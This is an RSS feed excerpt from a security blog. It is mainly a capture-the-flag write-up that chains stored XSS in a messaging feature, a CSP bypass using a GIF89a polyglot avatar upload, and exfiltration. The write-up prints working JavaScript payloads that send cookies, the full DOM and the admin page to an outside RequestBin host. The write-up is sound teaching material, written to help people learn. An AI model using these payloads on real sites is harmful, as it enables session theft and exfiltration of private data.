href="http://devalias.net/devalias/2017/11/19/presenting-all-the-things-bsides-wellington-csides-sectalks/blockquote%20class=%22twitter-tweet%22%3E%3Cp%20lang=%22en%22%20dir=%22ltr%22%3EMy%20notes%20on%20day%20one%20of%20the%20fabulous%20%3Ca%20href=%22https://twitter.com/hashtag/bsideswlg?src=hash&amp;ref_src=twsrc%5Etfw%22%3E#bsideswlg%3C/a%3E%20%3Ca%20href=%22https://t.co/5IABHBjr8G%22%3Ehttps://t.co/5IABHBjr8G%3C/a%3E%3C/p%3E—%20Nazi%20Tweeps%20Fuck%20Off%20(@hroethgar)%20%3Ca%20href=%22https://twitter.com/hroethgar/status/933620066129625090?ref_src=twsrc%5Etfw%22%3ENovember%2023,%202017%3C/a%3E%3C/blockquote%3E%0A%3Cscript%20async%20src=%22https://platform.twitter.com/widgets.js%22%20charset=%22utf-8%22%3E%3C/script">Twitter</a>)</li><li><a href="https://rodger.donaldson.gen.nz/archives/2017/11/b-sides-wellington-day-2/">B-Sides Wellington — Day 2 (Notes)</a></li><li><a href="https://www.asinine.nz/2017-11-25/bsides-badge-part1/">BSides Wellington Badge Challenge</a> (<a href="http://devalias.net/devalias/2017/11/19/presenting-all-the-things-bsides-wellington-csides-sectalks/blockquote%20class=%22twitter-tweet%22%3E%3Cp%20lang=%22en%22%20dir=%22ltr%22%3EA%20write%20up%20of%20the%20%3Ca%20href=%22https://twitter.com/hashtag/bsidesWLG?src=hash&amp;ref_src=twsrc%5Etfw%22%3E#bsidesWLG%3C/a%3E%20badge%20challenge.%20%3Ca%20href=%22https://twitter.com/bsideswlg?ref_src=twsrc%5Etfw%22%3E@bsideswlg%3C/a%3E%20%3Ca%20href=%22https://t.co/XC8tqAuOor%22%3Ehttps://t.co/XC8tqAuOor%3C/a%3E%3C/p%3E—%20Derek%20Robson%20(@asinine_net_nz)%20%3Ca%20href=%22https://twitter.com/asinine_net_nz/status/934592555253039104?ref_src=twsrc%5Etfw%22%3ENovember%2026,%202017%3C/a%3E%3C/blockquote%3E%0A%3Cscript%20async%20src=%22https://platform.twitter.com/widgets.js%22%20charset=%22utf-8%22%3E%3C/script">Twitter</a>)</li></ul><p>And of course, Twitter is always full of content when it comes to the security industry, with 3 hashtags mainly being used throughout the conference:</p><ul><li><a href="https://twitter.com/search?q=%23bsideswlg&amp;src=typd">#bsideswlg</a></li><li><a href="https://twitter.com/search?q=%23bsideswlg2017&amp;src=typd">#bsideswlg2017</a></li><li><a href="https://twitter.com/search?q=%23bsidesnz&amp;src=typd">#bsidesnz</a></li></ul><h3>Conclusion</h3><p>While at times I was definitely feeling the stress and pressure of having a few looming deadlines, and at times possibly not allocating enough time/energy/focus to working on them as I would have liked, it has been a great experience, and left a smouldering flame of passion to speak at more events in the future.</p><p>Know of any other write-ups, slides or tools; or got a cool story to share from BSides Wellington? Would love to hear from you in the comments!</p><p><em>Originally published at </em><a href="http://devalias.net/devalias/2017/11/19/presenting-all-the-things-bsides-wellington-csides-sectalks/"><em>devalias.net</em></a><em> on November 19, 2017.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=ff3bfec6b79a" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[CTF Snippets: XSS.gif]]></title>
            <link>https://medium.com/@devalias/ctf-snippets-xss-gif-bd614665252d?source=rss-4931d93bca2f------2</link>
            <guid isPermaLink="false">https://medium.com/p/bd614665252d</guid>
            <category><![CDATA[ctf]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[xss-attack]]></category>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[javascript]]></category>
            <dc:creator><![CDATA[Glenn 'devalias' Grant]]></dc:creator>
            <pubDate>Thu, 15 Sep 2016 14:00:00 GMT</pubDate>
            <atom:updated>2017-12-09T00:06:55.518Z</atom:updated>
            <content:encoded><![CDATA[<p>I was playing around with the top challenge on the CTF at <a href="http://www.sectalks.org/canberra/">SecTalks</a> the other night, and thought I’d do a quick writeup of some of the techniques required; for future reference, and to help others to learn.</p><h3>Hack the gibso.. Website</h3><p>To start off, we were given a URL to a website that looked like a pretty standard sort of blog. Features included things like account registration/login, avatar upload, messaging between users, search, posts (not by a standard account), comments on posts (standard account), showing online users, etc. And the administrator was online.. interesting.</p><p>Poking around at things, I discovered that the messaging system didn’t seem to filter out HTML from the subject/message body. Easy! (or so I thought) I put together a super basic PoC XSS payload and tried it out by sending a message to my own account:</p><pre>&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;</pre><p>I checked the message.. but for some reason it didn’t pop, even though my payload seemed fine in the source. :(</p><pre>&lt;div class=&quot;well&quot;&gt;<br>  &lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;<br>&lt;/div&gt;</pre><p>Looking at the developer console gave me some more insight. Apparently this site had <a href="https://en.wikipedia.org/wiki/Content_Security_Policy">Content Security Policy</a> enabled, and it was blocking my payload.</p><blockquote><em>Refused to execute inline script because it violates the following Content Security Policy directive: “script-src ‘self’”. Either the ‘unsafe-inline’ keyword, a hash (‘sha256-kNShxzU0TYI8w1bsujgbPcQ4oIISMT9erFfdwx1ma+M=’), or a nonce (‘nonce-…’) is required to enable inline execution.</em></blockquote><p>Probably should have noticed those headers earlier.. Oh well, now to find a way around them. With spacing added for readability, the headers looked like:</p><pre>Content-Security-Policy:<br>  default-src &#39;none&#39;;<br>  img-src &#39;self&#39; placehold.it *.imgix.net;<br>  script-src &#39;self&#39;;<br>  connect-src &#39;self&#39;;<br>  style-src &#39;self&#39; fonts.gstatic.com fonts.googleapis.com;<br>  font-src &#39;self&#39; fonts.googleapis.com fonts.gstatic.com;</pre><p>Since compromising Google or any other websites just to beat this CTF seemed out of the question, I figured I needed a way to get my script payload uploaded so that it would run from self.</p><p>How about that avatar upload functionality? Well, as you might expect, it was restricted to uploading images. But surely we could find a way around that.. right? Seems so! By making use of a super simple image format, we could trick the image checker and upload our payload.</p><p>Using the GIF89a format (which conveniently starts with it&#39;s name, then the rest is the GIF payload) I constructed and uploaded my new &#39;avatar&#39; pwn.gif, designed to steal cookies via <a href="http://requestb.in/">RequestBin</a>:</p><pre>GIF89a<em>/*.......*/</em><strong>=</strong>0;<br>window.location<strong>=</strong>&#39;http://requestb.in/secretcode?c=&#39;<strong>+</strong>document.cookie;</pre><p>This passed the file format checker (which should have seen it as a GIF), and hopefully when I included it in my XSS, the JavaScript would execute. Not the stealthiest payload, but it should do the trick. It was time to test out my new ‘avatar’ by sending myself a test message:</p><pre>&lt;script src=&quot;http://example.com/uploads/filenamehash.gif&quot;&gt;&lt;/script&gt;</pre><p>Loading the new message.. there was still no payload! :( It seems Chrome foiled my plans again:</p><blockquote><em>Refused to execute script from ‘</em><a href="http://example.com/uploads/filenamehash.gif"><em>http://example.com/uploads/filenamehash.gif</em></a><em>&#39; because its MIME type (‘image/gif’) is not executable.</em></blockquote><p>This seemed like a browser specific security feature though, so trying it out in Safari, my payload executed. Good work Apple security! Checking the captured results on RequestBin there were no cookies. Guess I probably should have looked at that HttpOnly flag first.. Sometimes I just get caught up in the heat of the moment.</p><p>Ok.. so we couldn’t steal the cookies.. but what could we do? <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)">Cross-Site Request Forgery (CSRF)</a> maybe? There was a CSRF token designed to prevent this, but it didn’t seem to get validated. That’s good.. but what should we target?</p><p>Needing some better visibility on the situation, I decided to just steal the whole <a href="https://en.wikipedia.org/wiki/Document_Object_Model">DOM</a> and have a look around. Maybe the administrator had other cool things to look at? Hacker-eyes activate! (comments added for clarity):</p><pre>GIF89a<em>/*.......*/</em><strong>=</strong>0;<br><em>/* Wait for the page to fully load */</em><br>window.onload <strong>=</strong> <strong>function</strong>() {<br>  <em>/* Create a form to send to RequestBin */</em><br>  <strong>var</strong> f <strong>=</strong> document.createElement(&#39;form&#39;);<br>  f.id<strong>=</strong>&quot;haxForm&quot;;<br>  f.method<strong>=</strong>&quot;post&quot;;<br>  f.action<strong>=</strong>&quot;http://requestb.in/secretcode&quot;;<br><br>  <em>/* Create a textarea to store our data */</em><br>  <strong>var</strong> t <strong>=</strong> document.createElement(&#39;textarea&#39;);<br>  t.name<strong>=</strong>&quot;haxPayload&quot;;<br><br>  <em>/* Capture the entire DOM and Base64 encode it */</em><br>  t.value <strong>=</strong> btoa(document.documentElement.outerHTML)<br><br>  <em>/* Inject the form and send it */</em><br>  f.appendChild(t);<br>  document.body.appendChild(f);<br>  document.getElementById(&quot;haxForm&quot;).submit();<br>};</pre><p>Ignoring my rusty JavaScript, the new payload would create a HTML form element with a textarea, grab the entire contents of the DOM, <a href="https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64/btoa">Base64 encode</a> them, stick them in the textarea, inject the form into the page, then send that off to RequestBin.</p><p>After checking that this actually worked against my own account, I sent a message to the administrator and waited. After a minute or so, the message status changed to read. Heading over to RequestBin and decoding the captured DOM, I found the following snippet:</p><pre>&lt;li&gt;&lt;a href=&quot;admin.php&quot;&gt;Administration&lt;/a&gt;&lt;/li&gt;</pre><p>Sweet, let’s find something juicy on that page! Reworking the payload (with a little help from <a href="https://api.jquery.com/jquery.get/">JQuery</a> that was already on the site):</p><pre>GIF89a<em>/*.......*/</em><strong>=</strong>0;<br><em>/* Wait for the page to fully load */</em><br>window.onload <strong>=</strong> <strong>function</strong>() {<br>  <em>/* Create a form to send to RequestBin */</em><br>  <strong>var</strong> f <strong>=</strong> document.createElement(&#39;form&#39;);<br>  f.id<strong>=</strong>&quot;haxForm&quot;;<br>  f.method<strong>=</strong>&quot;post&quot;;<br>  f.action<strong>=</strong>&quot;http://requestb.in/secretcode&quot;;<br><br>  <em>/* Create a textarea to store our data */</em><br>  <strong>var</strong> t <strong>=</strong> document.createElement(&#39;textarea&#39;);<br>  t.name<strong>=</strong>&quot;haxPayload&quot;;<br><br>  <em>/* Inject the form */</em><br>  f.appendChild(t);<br>  document.body.appendChild(f);<br><br>  <em>/* Load the admin page ajax-style, Base64 encode it, send it off */</em><br>  $.get(&quot;admin.php&quot;, <strong>function</strong>(data) {<br>    t.value <strong>=</strong> btoa(data);<br>    document.getElementById(&quot;haxForm&quot;).submit();<br>  });<br>};</pre><p>Using the last payload as the template, I updated it to load the admin.php page via ajax, Base64 encode the result and send it to RequestBin. After uploading, messaging the administrator, waiting, checking the response and decoding; it seemed there wasn&#39;t even a need to do anything else:</p><pre>&lt;legend&gt;<br>  &lt;h3&gt;Administration&lt;/h3&gt;<br>&lt;/legend&gt;<br>&lt;h4&gt;flag{the-secret-flag-code}&lt;/h4&gt;</pre><p>Mischief managed!</p><h3>Raw Notes</h3><p>I figured it might be fun to include the raw snippets of notes I made as I was going through this, to give a better idea of my thought process throughout:</p><ul><li>Administrator is online</li><li>We can send messages to users</li><li>We can inject images/etc in messages, but ContentSecurityPolicy blocks us from executing code from anywhere but self</li><li>We can upload image files (can we make that other types?)</li><li>GIF89a based XSS, won’t exec in chrome though..</li><li>Administrator will read messages we send them (check the ‘sent’ page)</li><li>Admin isn’t using chrome! :p</li><li>The request doesn’t send us any cookies! :( (they’re HTTP only)</li><li>CSRF token doesn’t seem to actually be validated.. What can we CSRF..?</li><li>Use the XSS to send us the admin’s DOM</li><li>Seems there’s an admin.php page..</li><li>Ajax the admin page</li><li>Success!</li></ul><h3>Conclusion</h3><p>This CTF was a pretty fun little challenge, tying together XSS, CSP bypass, file upload/image abuse and snooping through the DOM.</p><p>Has this helped you learn something new? Got a better way to approach it? I’d love to hear from you in the comments!</p><h3>References</h3><p><strong>Content Security Policy</strong></p><ul><li><a href="https://www.owasp.org/index.php/Content_Security_Policy">Content Security Policy | OWASP</a></li><li><a href="https://www.owasp.org/index.php/Content_Security_Policy_Cheat_Sheet">Content Security Policy Cheat Sheet | OWASP</a></li><li><a href="http://www.html5rocks.com/en/tutorials/security/content-security-policy/">“An Introduction to Content Security Policy” by HTML5 Rocks</a></li><li><a href="https://content-security-policy.com/">Content Security Policy References and Examples</a></li></ul><p><strong>File Upload/Image XSS</strong></p><ul><li><a href="https://blackpentesters.blogspot.com.au/2013/08/gif-image-xss.html">“GIF Image XSS” by eXpl0i13r</a></li><li><a href="http://brutelogic.com.br/blog/file-upload-xss/">File Upload XSS | Hack2Learn</a></li><li><a href="https://en.wikipedia.org/wiki/List_of_file_signatures">List of File Signatures | Wikipedia</a></li><li><a href="https://github.com/d0lph1n98/Defeating-PHP-GD-imagecreatefromgif">“Exploiting PHP-GD imagecreatefromgif() function” by d0lph1n98</a></li></ul><p><strong>Capturing Requests</strong></p><ul><li><a href="https://requestb.in/">Request Bin</a></li></ul><p><em>Originally published at </em><a href="http://devalias.net/devalias/2016/09/16/ctf-snippets-xss-gif/"><em>devalias.net</em></a><em> on September 16, 2016.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=bd614665252d" width="1" height="1" alt="">]]></content:encoded>
        </item>
    </channel>
</rss>